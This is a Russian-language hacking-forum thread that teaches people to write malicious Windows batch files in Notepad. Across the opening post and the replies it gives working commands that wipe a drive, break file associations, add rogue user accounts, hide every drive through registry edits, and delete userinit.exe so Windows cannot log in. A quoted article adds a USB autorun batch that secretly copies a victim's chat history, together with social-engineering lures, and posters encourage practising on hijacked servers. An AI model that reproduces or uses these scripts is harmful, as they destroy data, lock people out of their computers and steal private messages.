Вирус в блокноте

[dikobraz]

Вирус в блокноте

[Ссылки могут видеть только зарегистрированные пользователи. ]

Сегодня изучал снова правила. Ничего связанное с вирусами не нашел, нашел только, что DDOS, фрод и тд - ЗАПРЕЩЕНО. А вот про вирусы ничего написано не было.



В инете очень много различных вирусов, написанных в блокноте, но я постараюсь сделать самый веселый.

итак, начнем откройте блокнот и напишите команду

Вы можете для начала просто создать небольшой батник, например

Пишите слово calc и вставляете его еще раз 500-600

Код:

calc
calc
calc

и сохраняет под названием 1, но с разрешение .bat, а не .txt
И когда юзер запустит его у него загрузятся сразу около 500 калькуляторов (смотря какая ОС, также может быть так то, что загружается один калькулятор, ты его закрываешь, а следом другой.)
Еще есть команда md - создание, mspaint - пейнт

Грустно? Сейчас будет весело)

Теперь начнем

открываем блокнот и пишем @echo off - это команда будет скрывать все, что будет происходить в cmd

copy %0 c:\dikobraz.bat - копирует батник на диск c
copy %0 d:\dikobraz.bat - копирует батник на диск d
copy %0 e:\dikobraz.bat - копирует батник на диск e
copy %0 f:\dikobraz.bat - копирует батник на диск f
copy %0 z:\dikobraz.bat - копирует батник на диск z
copy %0 g:\dikobraz.bat - копирует батник на диск g

примечание. Вы можете создать хоть 26 таких копиров на диски. А мало ли. Вдруг у жертву C называется, как X.

label с: 3DeCb 6bIJl BuPyC - переименовывает диск "с" на 3DeCb 6bIJl BuPyC

Аналогично, делаем ринейм на другие диски

time 13:37 - переустанавливаем время
date 01.01.01 - меняем дату

del d:\ *.* /q - снесем диск d

с диском C не делать такого, удовольствия мало

assoc .exe=.mp3 - переделывает exe в mp3
assoc .doc=.mp3 - переделывает doc в mp3

net user "icq-num" /add - создает пользователя icq-num
net user "dikobraz" /add- создает пользователя dikobraz
exit - выход из батника
сохраняем, как dikobraz.bat


Вопрос.
Как сделать, чтобы пользователь компа его
открыл. Можно конечно объединить c ico в winrare, но мы сделаем, как нубы)

Кидаем батник в папку и скрываем ее, только так, чтобы при скрытие, выбрать тип скрыть папку, но не файл. Перед скрытием создайте ярлык и залейте на рабочий стол. Теперь переименуйте, как мой компьютер и щелкаем свойства папки - > настройка-> сменить ярлык и ищем мой компьютер. Я так на информатике делал)

[MrPLaM6uP]

а есть способ (случай с калькуляторами) что бы командная строка не открывалась?

[MicroCip]

Цитата: Сообщение от MrPLaM6uP

а есть способ (случай с калькуляторами) что бы командная строка не открывалась?

В этом не чего сложного, просто:

Код:

@echo off
calc
calc
calc

[MrPLaM6uP]

не не не не не
так мы не видим что происходит в ней, но само ее окно открывается)
я уже попробывал
я имел ввиду что бы даже окно не открывалось?

[dikobraz]

Del[x], kpeamub, скиньте ссылочку... Я когда тему создавал он мне ничего не высветил


Добавлено через 1 минуту
MrPLaM6uP, ну эт тогда не в блокноте надо писать...

[dikobraz]

Diablomy, ты уже во второй моей теме оффтопишь........и кстати антивирус не спалит

[Venom.exe]

Цитата: Сообщение от kpeamub

да что то знакомое

Да таких тем с подобным содержанием на всех форумах навалом

[dikobraz]

Venom.exe, Вы считаете, что это бездумный копипаст?
Статья написана мноою.. по моему личному опыту.. Тк, я сам раньше писал такие приколы. Могу скинуть тебе если хочешь

[Sani4]

то что ты здесь описал это мелкое болавство.
вот еслибы ты сделал подмену с regedit вот тут было бы интереснее.

допустим так
REG ADD "[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\policies\Explorer]" /v HonorAutoRunSetting /t REG_DWORD /d 00000001
REG ADD "[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\policies\Explorer]" /v NoDriveTypeAutoRun /t REG_DWORD /d 0000003c
REG ADD "[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\policies\Explorer]" /v NoDrives /t REG_DWORD /d 67108863

после перезагрузки пропадут все диски
и плюс занести в постоянный запуск чтоб не смог убрать

[Bandit 01]

Еще можно сделать вот такой батник:

Код:

@echo off
delete c:\windows\system32\userinit.exe

После перезагрузки войти в виндовс нельзя. Исправить это можно вернув этот файл назад.

[-=ExE=-]

я хочу чтобы батник делал вот так
mstsc -v 188.127.233.10
но как запустил подключения, закрылся
что дописать надо?

[AndXor]

напиши
pause

[villa 7]

выложите все свои работы, интересно посмотреть

[anthrax]

Ещё давно нашёл такую статью:

Пишем батник
Создавать,батник будем для второй ситуации (она не*много сложнее). Для написания батника возьмём стандартный блокнот. В блокноте пропишем следующие строки:

@Echo off
c:
chdir C:\Program Files\QIP\Users
f:\rar.exe a -r users -r > nul
copy users.rar g:\adc > nul
del users.rar > nul

где

©Echo off - скрывает ви*зуальный процесс копиро*вания.
C:\Program Files\QIP\Users - папка, в которой находится история.
f:\rar.exe а -г users > nul -запуск архиватора для ус*корения копирования.
copy users.rar g:\adc > nul - адрес куда копируем.
del users.rar > nul - удаляет созданный архив на жеском диске.

Не всегда бывает известна бук*ва флеш-диска. В "таком случае прописываем несколько вариан*тов (один уж точно угадаем):

@Echo off
с:
chdit C:\Program Files\QIP\Users
f:\rar.exe а -г users > nul
copy users.rar e:\abc > nul
g:\rar.exe a -r users > nul
copy users.rar g:\abc > nul
h:\rar.exe a -r users > nul
copy users.rar h:\abc > nul
del users-rar > nul
Сохраняем наш текстовый документ. Назовём его xxx.txt. Теперь меняем расши*рение c .txt нa .bat. Это мож*но сделать в Total Commander'e.

Создаем автозапуск
Теперь надо сделать так, что*бы батник автоматически запускался с флешки при под*ключении к компьютеру. Для это*го создаём новый текстовый до*кумент и пишем в нём:

[autorun]
ShellExeCute="xxx.bat"
Сохраняем файл и переимено*вываем его на autorun.inf.

Делаем архив
Далее нам предстоит позабо*тится об архиваторе. QIP-история может быть большая. Что*бы процесс копирования происхо*дил быстрее мы её заархивируем.

Из папки с WinRAR (по умолча*нию C:\Program Files\WinRAR бе*рём файлик rar.exe. Создаём в корне флешки папку с именем abc. Также, в корень флешки бро*саем остальные три файла (xxx.bat, autorun.inf, rar.exe).

Все файлы скрываем от посто*ронних глаз (правой кнопкой мы*ши вызываем Меню на файле > Свойства > Скрытый. Это всё. Отдаём флешку "жертве" и ждём результата.

Социальная инженерия
Не обязательно делать авто*запуск. "Жертва" сама мо*жет запустить батник. Для этого надо воспользоваться социаль*ной инженерией. Например, со*общаем пользователю о том, что компания Microsoft выпустила новое обновление для Windows. Это обновление повышает быстро*действие и без*опасность опера*ционной системы. Устанавливать об*новление нужно то*лько с флешки. Можете сами придумать причи*ну, по которой на*до запустить наш батник. Всё зави*сит от вашей фан*тазии и смекалки.

[dikobraz]

кстати, ребят, свое мастерство можно отработать на дедиках

[LiLi]

Цитата: Сообщение от TCOooo

а могет кто то написать батник для создания скрытой учетки на дедике?

Лови:

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 5 сообщение(ий)):

У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.

[dikobraz]

LiLi, я так понимаю эти команды надо писать неизменно? и полностью?

Код:

Set AdmGroupSID=S-1-5-32-544
Set AdmGroup=
For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J
Set AdmGroup=%AdmGroup:~0,-1%

[LiLi]

dikobraz, Заменить нужно данные на свои (имя учетки и пароль учетки)
Потом поменять расширение на .bat , ну и запустить соответственно)